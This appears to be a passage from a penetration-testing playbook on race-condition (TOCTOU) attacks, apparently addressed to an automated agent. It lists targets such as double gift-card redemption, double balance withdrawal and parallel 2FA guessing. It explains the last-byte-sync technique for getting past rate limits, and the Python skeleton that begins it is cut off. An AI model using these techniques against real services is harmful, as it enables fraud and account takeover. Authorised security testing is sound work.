racelisted

# Race / TOCTOU playbook Confirm the target is in scope for stress-style testing (multiple parallel requests can look like abuse). Then identify the candidate operation. Execution rule: capture a real request for the operation and replay that request with concrete cookies/body values. Never write literal placeholders such as `<sess>` to files; ask once if a session or replayable request is missing. ## Targets worth racing - Redeem a gift card / promo code (does the second redeem succeed?) - Cast a vote / claim a one-per-user reward - Withdraw / transfer balance (does it deduct twice?) - Submit a 2FA code (can N parallel guesses each be checked against an unused-attempts counter?) - Apply a discount that's supposed to be once-per-cart - Send a friend / invite request (creates duplicate rows / privileges) - Confirm an email (mark verified twice with different addresses) - Upload then read a file (write `safe.png`, then race a swap to `evil.svg` before AV scans) ## 1. Burp-style "single packet attack" (last-byte sync) — preferred Modern servers buffer HTTP/2 frames. The classic trick: send N requests where each is fully serialized *except* the last byte. Then in a single TCP write, flush the final byte of all N. The server receives them effectively simultaneously and dispatches them in parallel — bypassing nearly all software-side rate limiting. You can do this with a small Go/Python script. Skeleton (Python, HTTP/2): ```python import asyncio, ssl import httpx async def